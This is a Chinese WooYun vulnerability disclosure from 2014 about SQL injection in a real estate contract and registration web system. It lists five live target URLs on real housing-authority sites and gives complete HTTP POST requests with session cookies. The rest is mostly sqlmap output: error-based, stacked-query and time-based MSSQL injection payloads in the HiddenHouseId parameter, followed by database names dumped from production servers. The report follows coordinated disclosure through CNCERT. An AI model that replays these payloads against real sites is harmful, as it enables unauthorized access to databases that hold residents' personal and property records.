当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-078357

漏洞标题:某通用型备案系统存在SQL注入漏洞

相关厂商:重庆光大网络公司

漏洞作者: Mr.leo

提交时间:2014-10-11 15:57

修复时间:2015-01-09 15:58

公开时间:2015-01-09 15:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-11: 细节已通知厂商并且等待厂商处理中
2014-10-16: 厂商已经确认,细节仅向厂商公开
2014-10-19: 细节向第三方安全合作伙伴开放
2014-12-10: 细节向核心白帽子及相关领域专家公开
2014-12-20: 细节向普通白帽子公开
2014-12-30: 细节向实习白帽子公开
2015-01-09: 细节向公众公开

简要描述:

BOOM!!

详细说明:

百度搜索关键字:本站由重庆光大网络公司提供技术支持
重庆光大网络技术有限公司开发的商品房网上签约及备案系统

1.png


提供5个案例证明其通用性,
http://222.86.207.241/Wxzj/RepairQuery/OwnerSearchByName.aspx
http://www.dyfgs.com/Wxzj/RepairQuery/OwnerSearchByName.aspx
http://www.ysfgj.com.cn/Wxzj/RepairQuery/OwnerSearchByName.aspx
http://www.zylzfc.cn/Wxzj/RepairQuery/OwnerSearchByName.aspx
http://221.10.67.197/Wxzj/RepairQuery/OwnerSearchByName.aspx
post的HiddenHouseId参数没有过滤,导致注入
1、POST /Wxzj/RepairQuery/OwnerSearchByName.aspx HTTP/1.1
Content-Length: 893
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://222.86.207.241/index.aspx
Cookie: ASP.NET_SessionId=kedieu2bmqnkem3lt3ihn455; showloupan=new; FORMSAUTHCOOKIE=912F853B6EDF4602099C9709FB041047A17B078B79A7CCE2DBADB9D5122D580186C74A5577A30E2196CE7C8DB46219C86609F64FAF1724013EE047EFE52C13779949A88F8629BFE7637B2E50A7A9E8FC; CheckCode=R6462
Host: 222.86.207.241
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&HiddenHouseId=1&hiddenId=&hplusMoney=0.00&hsendPayMoney=0.00&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&ScriptManager1=ScriptManager1%7CBtnShowOneOwnerInfo&time=&TxtAuto=&TxtHouseId=e&TxtIdNum=e&TxtReal=&TxtType=&__ASYNCPOST=true&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=%2FwEWEgLgr%2FPxAQK%2F1IjCDgL5%2BLqdCQLIr5%2FACALQysnjAwLPj%2B2oDwKo3LqNCQLKzcyPAwLo2pbPDwLD7cCLBAKZ2fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5fDCQLl7LSbDAKsjPiFBgKFuZQeUjivC%2FqSOOvj61ago0XVbyzDyVM%3D&__VIEWSTATE=%2FwEPDwULLTExNjY0NjA0NzQPFgIeBFVzZXJkFgICAw9kFgQCAw9kFgJmDxUBGOe7tOS%2Frui1hOmHkeS4muS4u%2BafpeivomQCEw9kFgJmD2QWCgIXDxYCHgtfIUl0ZW1Db3VudGZkAh8PFgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkAisPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJQnRuU2VhcmNoT0tNJI19qgXyT0mJikHjkBJvNBeEkg%3D%3D
Place: POST
Parameter: HiddenHouseId
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&Hidde
nHouseId=1') AND 3266=CONVERT(INT,(CHAR(58)+CHAR(108)+CHAR(110)+CHAR(105)+CHAR(5
8)+(SELECT (CASE WHEN (3266=3266) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHA
R(112)+CHAR(113)+CHAR(98)+CHAR(58))) AND ('HzaP'='HzaP&hiddenId=&hplusMoney=0.00
&hsendPayMoney=0.00&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&ScriptM
anager1=ScriptManager1|BtnShowOneOwnerInfo&time=&TxtAuto=&TxtHouseId=e&TxtIdNum=
e&TxtReal=&TxtType=&__ASYNCPOST=true&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALI
DATION=/wEWEgLgr/PxAQK/1IjCDgL5+LqdCQLIr5/ACALQysnjAwLPj+2oDwKo3LqNCQLKzcyPAwLo2
pbPDwLD7cCLBAKZ2fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5fDCQLl7LSbDAKsjPiFBgKFuZQeUjivC
/qSOOvj61ago0XVbyzDyVM=&__VIEWSTATE=/wEPDwULLTExNjY0NjA0NzQPFgIeBFVzZXJkFgICAw9k
FgQCAw9kFgJmDxUBGOe7tOS/rui1hOmHkeS4muS4u+afpeivomQCEw9kFgJmD2QWCgIXDxYCHgtfIUl0
ZW1Db3VudGZkAh8PFgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkAisPFgIfAWZkGAEFHl9fQ29udHJvbHNS
ZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJQnRuU2VhcmNoT0tNJI19qgXyT0mJikHjkBJvNBeEkg==
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&Hidde
nHouseId=1'); WAITFOR DELAY '0:0:5';--&hiddenId=&hplusMoney=0.00&hsendPayMoney=0
.00&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&ScriptManager1=ScriptMa
nager1|BtnShowOneOwnerInfo&time=&TxtAuto=&TxtHouseId=e&TxtIdNum=e&TxtReal=&TxtTy
pe=&__ASYNCPOST=true&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWEgLgr
/PxAQK/1IjCDgL5+LqdCQLIr5/ACALQysnjAwLPj+2oDwKo3LqNCQLKzcyPAwLo2pbPDwLD7cCLBAKZ2
fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5fDCQLl7LSbDAKsjPiFBgKFuZQeUjivC/qSOOvj61ago0XVb
yzDyVM=&__VIEWSTATE=/wEPDwULLTExNjY0NjA0NzQPFgIeBFVzZXJkFgICAw9kFgQCAw9kFgJmDxUB
GOe7tOS/rui1hOmHkeS4muS4u+afpeivomQCEw9kFgJmD2QWCgIXDxYCHgtfIUl0ZW1Db3VudGZkAh8P
FgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkAisPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJh
Y2tLZXlfXxYBBQxJQnRuU2VhcmNoT0tNJI19qgXyT0mJikHjkBJvNBeEkg==
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&Hidde
nHouseId=1') WAITFOR DELAY '0:0:5'--&hiddenId=&hplusMoney=0.00&hsendPayMoney=0.0
0&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&ScriptManager1=ScriptMana
ger1|BtnShowOneOwnerInfo&time=&TxtAuto=&TxtHouseId=e&TxtIdNum=e&TxtReal=&TxtType
=&__ASYNCPOST=true&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWEgLgr/P
xAQK/1IjCDgL5+LqdCQLIr5/ACALQysnjAwLPj+2oDwKo3LqNCQLKzcyPAwLo2pbPDwLD7cCLBAKZ2fb
4DQLR65XlBwKH3dr3AgKr8LPlDwLag5fDCQLl7LSbDAKsjPiFBgKFuZQeUjivC/qSOOvj61ago0XVbyz
DyVM=&__VIEWSTATE=/wEPDwULLTExNjY0NjA0NzQPFgIeBFVzZXJkFgICAw9kFgQCAw9kFgJmDxUBGO
e7tOS/rui1hOmHkeS4muS4u+afpeivomQCEw9kFgJmD2QWCgIXDxYCHgtfIUl0ZW1Db3VudGZkAh8PFg
IfAWZkAiMPFgIfAWZkAicPFgIfAWZkAisPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2
tLZXlfXxYBBQxJQnRuU2VhcmNoT0tNJI19qgXyT0mJikHjkBJvNBeEkg==
---
[17:40:52] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[17:40:52] [INFO] fetching database names
[17:40:57] [INFO] the SQL query used returns 15 entries
[17:42:50] [INFO] fetching number of databases
[17:42:50] [INFO] retrieved:
[17:42:50] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[17:43:17] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' and/or switch '--hex'
[17:43:17] [ERROR] unable to retrieve the number of databases
[17:43:22] [INFO] retrieved: RepairHouseFund
[17:43:27] [INFO] retrieved: master
[17:43:33] [INFO] retrieved: tempdb
[17:43:37] [INFO] retrieved: model
[17:43:42] [INFO] retrieved: msdb
[17:43:47] [INFO] retrieved: ReportServer
[17:43:52] [INFO] retrieved: ReportServerTempDB
[17:43:57] [INFO] retrieved: House
[17:44:02] [INFO] retrieved: ASPState
[17:44:07] [INFO] retrieved: house_image1
[17:44:12] [INFO] retrieved: House_New
[17:44:16] [INFO] retrieved: house_telinfo
[17:44:22] [INFO] retrieved: House_TmpHk
[17:44:26] [INFO] retrieved: House_Data
[17:44:31] [INFO] retrieved: RepairHouseFund
[17:44:36] [INFO] retrieved: House_old
2、POST /Wxzj/RepairQuery/OwnerSearchByName.aspx HTTP/1.1
Content-Length: 828
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.dyfgs.com/Wxzj/RepairQuery/OwnerSearchByName.aspx
Cookie: ASP.NET_SessionId=cps1qa451anibd55dzvkubfv
Host: www.dyfgs.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&HiddenHouseId=1&hiddenId=&hplusMoney=0.00&hsendPayMoney=0.00&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&IBtnSearchOK=&time=1&TxtAuto=1&TxtHouseId=1&TxtIdNum=1&TxtReal=1&TxtType=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWEgLp/5q3BwK/1IjCDgL5%2bLqdCQLIr5/ACALQysnjAwLPj%2b2oDwKo3LqNCQLKzcyPAwLo2pbPDwLD7cCLBAKZ2fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5fDCQLl7LSbDAKsjPiFBgKFuZQeyzZn3dt4cRHc8vMijn2Rv2TxZQc%3d&__VIEWSTATE=/wEPDwULLTExNjY0NjA0NzQPFgIeBFVzZXJkFgICAw9kFgQCAw9kFgJmDxUBGOe7tOS/rui1hOmHkeS4muS4u%2bafpeivomQCEw9kFgJmD2QWCgIXDxYCHgtfIUl0ZW1Db3VudGZkAh8PFgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkAisPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJQnRuU2VhcmNoT0u7kh5K6u8UmpgQTJ5Eel4WUqOCrg%3d%3d
sqlmap identified the following injection points with a total of 98 HTTP(s) requests:
---
Place: POST
Parameter: HiddenHouseId
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&HiddenHouseId=1'); WAITFOR DELAY '0:0:5';--&hiddenId=&hplusMoney=0.00&hsendPayMoney=0.00&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&IBtnSearchOK=&time=1&TxtAuto=1&TxtHouseId=1&TxtIdNum=1&TxtReal=1&TxtType=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWEgLp/5q3BwK/1IjCDgL5+LqdCQLIr5/ACALQysnjAwLPj+2oDwKo3LqNCQLKzcyPAwLo2pbPDwLD7cCLBAKZ2fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5fDCQLl7LSbDAKsjPiFBgKFuZQeyzZn3dt4cRHc8vMijn2Rv2TxZQc=&__VIEWSTATE=/wEPDwULLTExNjY0NjA0NzQPFgIeBFVzZXJkFgICAw9kFgQCAw9kFgJmDxUBGOe7tOS/rui1hOmHkeS4muS4u+afpeivomQCEw9kFgJmD2QWCgIXDxYCHgtfIUl0ZW1Db3VudGZkAh8PFgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkAisPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJQnRuU2VhcmNoT0u7kh5K6u8UmpgQTJ5Eel4WUqOCrg==
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&HiddenHouseId=1') WAITFOR DELAY '0:0:5'--&hiddenId=&hplusMoney=0.00&hsendPayMoney=0.00&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&IBtnSearchOK=&time=1&TxtAuto=1&TxtHouseId=1&TxtIdNum=1&TxtReal=1&TxtType=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWEgLp/5q3BwK/1IjCDgL5+LqdCQLIr5/ACALQysnjAwLPj+2oDwKo3LqNCQLKzcyPAwLo2pbPDwLD7cCLBAKZ2fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5fDCQLl7LSbDAKsjPiFBgKFuZQeyzZn3dt4cRHc8vMijn2Rv2TxZQc=&__VIEWSTATE=/wEPDwULLTExNjY0NjA0NzQPFgIeBFVzZXJkFgICAw9kFgQCAw9kFgJmDxUBGOe7tOS/rui1hOmHkeS4muS4u+afpeivomQCEw9kFgJmD2QWCgIXDxYCHgtfIUl0ZW1Db3VudGZkAh8PFgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkAisPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJQnRuU2VhcmNoT0u7kh5K6u8UmpgQTJ5Eel4WUqOCrg==
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: HiddenHouseId
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&HiddenHouseId=1'); WAITFOR DELAY '0:0:5';--&hiddenId=&hplusMoney=0.00&hsendPayMoney=0.00&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&IBtnSearchOK=&time=1&TxtAuto=1&TxtHouseId=1&TxtIdNum=1&TxtReal=1&TxtType=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWEgLp/5q3BwK/1IjCDgL5+LqdCQLIr5/ACALQysnjAwLPj+2oDwKo3LqNCQLKzcyPAwLo2pbPDwLD7cCLBAKZ2fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5fDCQLl7LSbDAKsjPiFBgKFuZQeyzZn3dt4cRHc8vMijn2Rv2TxZQc=&__VIEWSTATE=/wEPDwULLTExNjY0NjA0NzQPFgIeBFVzZXJkFgICAw9kFgQCAw9kFgJmDxUBGOe7tOS/rui1hOmHkeS4muS4u+afpeivomQCEw9kFgJmD2QWCgIXDxYCHgtfIUl0ZW1Db3VudGZkAh8PFgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkAisPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJQnRuU2VhcmNoT0u7kh5K6u8UmpgQTJ5Eel4WUqOCrg==
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&HiddenHouseId=1') WAITFOR DELAY '0:0:5'--&hiddenId=&hplusMoney=0.00&hsendPayMoney=0.00&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&IBtnSearchOK=&time=1&TxtAuto=1&TxtHouseId=1&TxtIdNum=1&TxtReal=1&TxtType=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWEgLp/5q3BwK/1IjCDgL5+LqdCQLIr5/ACALQysnjAwLPj+2oDwKo3LqNCQLKzcyPAwLo2pbPDwLD7cCLBAKZ2fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5fDCQLl7LSbDAKsjPiFBgKFuZQeyzZn3dt4cRHc8vMijn2Rv2TxZQc=&__VIEWSTATE=/wEPDwULLTExNjY0NjA0NzQPFgIeBFVzZXJkFgICAw9kFgQCAw9kFgJmDxUBGOe7tOS/rui1hOmHkeS4muS4u+afpeivomQCEw9kFgJmD2QWCgIXDxYCHgtfIUl0ZW1Db3VudGZkAh8PFgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkAisPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJQnRuU2VhcmNoT0u7kh5K6u8UmpgQTJ5Eel4WUqOCrg==
---
available databases [41]:
[*] @
[*] [House_DzdaIm\x04q]
[*] [House_DzdaImg139\x05}]
[*] ASPState
[*] fcgl
[*] HoDq
[*] hosue_dy
[*] Houqe_DzdaImg12A
[*] house
[*] house_ch
[*] House_DzdaIag138
3、POST /Wxzj/RepairQuery/OwnerSearchByName.aspx HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.ysfgj.com.cn/Wxzj/RepairQuery/OwnerSearchByName.aspx
Content-Length: 783
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: ASP.NET_SessionId=ptaucuvphlrr1255w1zz2545
Host: www.ysfgj.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&HiddenHouseId=1&hiddenId=&hplusMoney=0.00&hsendPayMoney=0.00&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&IBtnSearchOK=&time=1&TxtAuto=1&TxtHouseId=1&TxtIdNum=1&TxtReal=1&TxtType=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWEgLBlMagBAK/1IjCDgL5%2bLqdCQLIr5/ACALQysnjAwLPj%2b2oDwKo3LqNCQLKzcyPAwLo2pbPDwLD7cCLBAKZ2fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5fDCQLl7LSbDAKsjPiFBgKFuZQeRMBQXBSV98AxJB0MuvuPErqMjmk%3d&__VIEWSTATE=/wEPDwULLTExNjY0NjA0NzQPFgIeBFVzZXJkFgICAw9kFgQCAw9kFgJmDxUBGOe7tOS/rui1hOmHkeS4muS4u%2bafpeivomQCEw9kFgJmD2QWCgIXDxYCHgtfIUl0ZW1Db3VudGZkAh8PFgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkAisPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJQnRuU2VhcmNoT0uo21B0Cq4ONoFrqrIhCK5e%2bTz6Mw%3d%3d
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: HiddenHouseId
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&Hidde
nHouseId=1') AND 1297=CONVERT(INT,(CHAR(58)+CHAR(97)+CHAR(112)+CHAR(109)+CHAR(58
)+(SELECT (CASE WHEN (1297=1297) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR
(98)+CHAR(112)+CHAR(117)+CHAR(58))) AND ('PTfq'='PTfq&hiddenId=&hplusMoney=0.00&
hsendPayMoney=0.00&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&IBtnSear
chOK=&time=1&TxtAuto=1&TxtHouseId=1&TxtIdNum=1&TxtReal=1&TxtType=1&__EVENTARGUME
NT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWEgLBlMagBAK/1IjCDgL5+LqdCQLIr5/ACALQysn
jAwLPj+2oDwKo3LqNCQLKzcyPAwLo2pbPDwLD7cCLBAKZ2fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5f
DCQLl7LSbDAKsjPiFBgKFuZQeRMBQXBSV98AxJB0MuvuPErqMjmk=&__VIEWSTATE=/wEPDwULLTExNj
Y0NjA0NzQPFgIeBFVzZXJkFgICAw9kFgQCAw9kFgJmDxUBGOe7tOS/rui1hOmHkeS4muS4u+afpeivom
QCEw9kFgJmD2QWCgIXDxYCHgtfIUl0ZW1Db3VudGZkAh8PFgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkAi
sPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJQnRuU2VhcmNoT0uo21
B0Cq4ONoFrqrIhCK5e+Tz6Mw==
---
[09:25:09] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[09:25:09] [INFO] fetching database names
[09:25:14] [INFO] the SQL query used returns 71 entries
[09:25:23] [WARNING] reflective value(s) found and filtering out
[09:35:46] [INFO] retrieved: repairhousefund_ys
[09:35:51] [INFO] retrieved: master
[09:35:56] [INFO] retrieved: tempdb
[09:36:01] [INFO] retrieved: model
[09:36:06] [INFO] retrieved: msdb
[09:36:11] [INFO] retrieved: ReportServer
[09:36:15] [INFO] retrieved: ReportServerTempDB
[09:36:23] [INFO] retrieved: ASPState
[09:36:28] [INFO] retrieved: House_ZSHouse
[09:36:33] [INFO] retrieved: house_old
[09:36:38] [INFO] retrieved: House_DzdaImg1
[09:36:43] [INFO] retrieved: house_yy
[09:36:47] [INFO] retrieved: House_OldHouse
[09:36:52] [INFO] retrieved: repairhousefund_ys
[09:36:57] [INFO] retrieved: zfbz
[09:37:02] [INFO] retrieved: House_DzdaImg10
[09:37:07] [INFO] retrieved: house_Eavl
[09:37:12] [INFO] retrieved: House_DzdaImg11
[09:37:17] [INFO] retrieved: House_DzdaImg12
[09:37:22] [INFO] retrieved: House_DzdaImg13
[09:37:26] [INFO] retrieved: House_DzdaImg14
[09:37:32] [INFO] retrieved: House_DzdaImg15
[09:37:36] [INFO] retrieved: House_DzdaImg16
[09:37:41] [INFO] retrieved: House_DzdaImg17
[09:37:46] [INFO] retrieved: House_DzdaImg18
[09:37:51] [INFO] retrieved: House_DzdaImg19
[09:37:56] [INFO] retrieved: House_DzdaImg2
[09:38:01] [INFO] retrieved: House_DzdaImg20
[09:38:06] [INFO] retrieved: House_DzdaImg21
[09:38:10] [INFO] retrieved: House_Telinfo
[09:38:16] [INFO] retrieved: House_DzdaImg22
[09:38:21] [INFO] retrieved: House_DzdaImg23
[09:38:25] [INFO] retrieved: House_DzdaImg3
[09:38:30] [INFO] retrieved: House_DzdaImg4
[09:38:35] [INFO] retrieved: House_DzdaImg5
[09:38:40] [INFO] retrieved: House_DzdaImg6
[09:38:45] [INFO] retrieved: House_DzdaImg7
[09:38:50] [INFO] retrieved: House_DzdaImg8
[09:38:54] [INFO] retrieved: House_DzdaImg9
4、POST /Wxzj/RepairQuery/OwnerSearchByName.aspx HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.zylzfc.cn/Wxzj/RepairQuery/OwnerSearchByName.aspx
Content-Length: 783
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: ASP.NET_SessionId=puimkc55mwvvb1rtkqrju0eg
Host: www.zylzfc.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&HiddenHouseId=1&hiddenId=&hplusMoney=0.00&hsendPayMoney=0.00&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&IBtnSearchOK=&time=1&TxtAuto=1&TxtHouseId=1&TxtIdNum=1&TxtReal=1&TxtType=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWEgLd9%2bnDBQK/1IjCDgL5%2bLqdCQLIr5/ACALQysnjAwLPj%2b2oDwKo3LqNCQLKzcyPAwLo2pbPDwLD7cCLBAKZ2fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5fDCQLl7LSbDAKsjPiFBgKFuZQeAQGG6wKrTKTu6HUfjksiL4m4xHE%3d&__VIEWSTATE=/wEPDwULLTExNjY0NjA0NzQPFgIeBFVzZXJkFgICAw9kFgQCAw9kFgJmDxUBGOe7tOS/rui1hOmHkeS4muS4u%2bafpeivomQCEw9kFgJmD2QWCgIXDxYCHgtfIUl0ZW1Db3VudGZkAh8PFgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkAisPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJQnRuU2VhcmNoT0uNcF4ENH7hIoFBuwamC0W4foylvA%3d%3d
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: HiddenHouseId
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&Hidde
nHouseId=1'); WAITFOR DELAY '0:0:5';--&hiddenId=&hplusMoney=0.00&hsendPayMoney=0
.00&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&IBtnSearchOK=&time=1&Tx
tAuto=1&TxtHouseId=1&TxtIdNum=1&TxtReal=1&TxtType=1&__EVENTARGUMENT=&__EVENTTARG
ET=&__EVENTVALIDATION=/wEWEgK1jY7CDgK/1IjCDgL5+LqdCQLIr5/ACALQysnjAwLPj+2oDwKo3L
qNCQLKzcyPAwLo2pbPDwLD7cCLBAKZ2fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5fDCQLl7LSbDAKsjP
iFBgKFuZQeTamt6G1z5+OyrqwqEBhs4hfVisk=&__VIEWSTATE=/wEPDwULLTExNjY0NjA0NzQPFgIeB
FVzZXJkFgICAw9kFgQCAw9kFgJmDxUBGOe7tOS/rui1hOmHkeS4muS4u+afpeivomQCEw9kFgJmD2QWC
gIXDxYCHgtfIUl0ZW1Db3VudGZkAh8PFgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkAisPFgIfAWZkGAEFH
l9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJQnRuU2VhcmNoT0uToP6+Zv77PjBNc7R5A
QNJwm86qQ==
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&Hidde
nHouseId=1') WAITFOR DELAY '0:0:5'--&hiddenId=&hplusMoney=0.00&hsendPayMoney=0.0
0&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&IBtnSearchOK=&time=1&TxtA
uto=1&TxtHouseId=1&TxtIdNum=1&TxtReal=1&TxtType=1&__EVENTARGUMENT=&__EVENTTARGET
=&__EVENTVALIDATION=/wEWEgK1jY7CDgK/1IjCDgL5+LqdCQLIr5/ACALQysnjAwLPj+2oDwKo3LqN
CQLKzcyPAwLo2pbPDwLD7cCLBAKZ2fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5fDCQLl7LSbDAKsjPiF
BgKFuZQeTamt6G1z5+OyrqwqEBhs4hfVisk=&__VIEWSTATE=/wEPDwULLTExNjY0NjA0NzQPFgIeBFV
zZXJkFgICAw9kFgQCAw9kFgJmDxUBGOe7tOS/rui1hOmHkeS4muS4u+afpeivomQCEw9kFgJmD2QWCgI
XDxYCHgtfIUl0ZW1Db3VudGZkAh8PFgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkAisPFgIfAWZkGAEFHl9
fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJQnRuU2VhcmNoT0uToP6+Zv77PjBNc7R5AQN
Jwm86qQ==
---
[09:36:15] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
